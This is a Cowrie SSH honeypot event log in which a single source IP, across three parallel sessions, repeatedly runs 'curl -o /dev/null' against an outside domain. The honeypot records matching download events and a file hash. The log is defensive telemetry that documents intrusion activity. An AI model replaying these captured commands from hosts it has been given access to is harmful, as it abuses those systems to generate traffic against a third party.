{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.396013Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.422972Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.425633Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.428072Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.428872Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.434167Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.434947Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.436365Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.437178Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.466604Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.468682Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.471276Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.473656Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.474530Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.479466Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.481534Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.482152Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.485588Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.486185Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.512297Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.514251Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.516732Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.519683Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.520511Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.523317Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.523957Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.525642Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.526173Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.559253Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.561290Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.564053Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.566040Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.566790Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.569261Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.570559Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.572508Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.573133Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.580290Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.606748Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.610576Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.611372Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.613513Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.614291Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.616115Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.616828Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.624526Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.650373Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.652443Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.654246Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.654786Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.659516Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.661706Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.662544Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.664124Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.665023Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.718881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.720735Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.723296Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.724348Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.725075Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.727025Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.727774Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.729486Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.730062Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.766221Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.768744Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.770398Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.771101Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.774498Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.775791Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.778409Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.779264Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.782887Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.813546Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.815581Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.819172Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.820410Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.821123Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.825137Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
